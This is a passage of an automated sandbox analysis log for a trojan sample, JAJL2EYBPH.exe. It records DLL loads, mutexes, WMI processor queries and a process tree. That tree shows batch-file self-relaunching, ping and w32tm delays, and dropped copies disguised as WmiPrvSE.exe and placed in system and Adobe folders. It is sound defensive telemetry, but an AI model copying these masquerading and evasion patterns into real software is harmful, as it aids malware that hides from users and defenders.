Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasman.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rtutils.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winhttp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: uxtheme.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: propsys.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: apphelp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dlnashext.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wpdshext.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: edputil.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: urlmon.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: iertutil.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: srvcli.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: netutils.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wintypes.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: appresolver.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: slc.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: sppc.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: mscoree.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: mswsock.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: cryptsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rsaenh.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: cryptbase.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: napinsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wshbth.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: nlaapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dnsapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winrnr.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winnsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: amsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasapi32.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasman.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rtutils.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winhttp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: uxtheme.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: propsys.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: apphelp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dlnashext.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wpdshext.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: edputil.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: urlmon.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: iertutil.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: srvcli.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: netutils.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wintypes.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: appresolver.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: slc.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: sppc.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: mscoree.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: mswsock.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: cryptsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rsaenh.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: cryptbase.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: napinsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wshbth.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: nlaapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dnsapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winrnr.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winnsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: amsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasapi32.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasman.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rtutils.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winhttp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: uxtheme.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: propsys.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: apphelp.dll

Uses 32bit PE files

Source: JAJL2EYBPH.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@114/50@1/1

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

Code function: 0_2_00B87727 GetLastError,FormatMessageW,

0_2_00B87727

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

Code function: 0_2_00B9B6D2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00B9B6D2

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe

File created: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe

File created: C:\Users\Public\Music\QmitaxvEcgoLLOqeIEyLx.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
Source: C:\Windows\twain_32\WmiPrvSE.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2124:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4556:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8072:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5088:120:WilError_03
Source: C:\Windows\twain_32\WmiPrvSE.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\3b2259475261fce0542be8d1ba386881c0bdd3eefdac74564ad4d6228ffb22f8
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0

Jump to behavior

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Command line argument: sfxname	0_2_00B9F05C
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Command line argument: sfxstime	0_2_00B9F05C
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Command line argument: STARTDLG	0_2_00B9F05C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Command line argument: sfxname	3_2_009FF05C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Command line argument: sfxstime	3_2_009FF05C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Command line argument: STARTDLG	3_2_009FF05C

Source: JAJL2EYBPH.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: JAJL2EYBPH.exe	Virustotal: Detection: 70%
Source: JAJL2EYBPH.exe	ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

File read: C:\Users\user\Desktop\JAJL2EYBPH.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\JAJL2EYBPH.exe "C:\Users\user\Desktop\JAJL2EYBPH.exe"
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe work.exe -priverdD
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NpnD5G3qEA.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\x3fbj0yJ9Y.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZXPLL9zJFP.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\UO0HaVbJ1O.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\v8evR6XBmk.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3LXAY36iRv.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NqvJKoZOIs.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rq9fLK5Nyj.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Vs6Gb3dzjw.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\diBg3fIzhe.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nBqbaEi3SG.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\g3J0tdP0ue.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe work.exe -priverdD	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NpnD5G3qEA.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\x3fbj0yJ9Y.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZXPLL9zJFP.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\UO0HaVbJ1O.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\v8evR6XBmk.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3LXAY36iRv.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
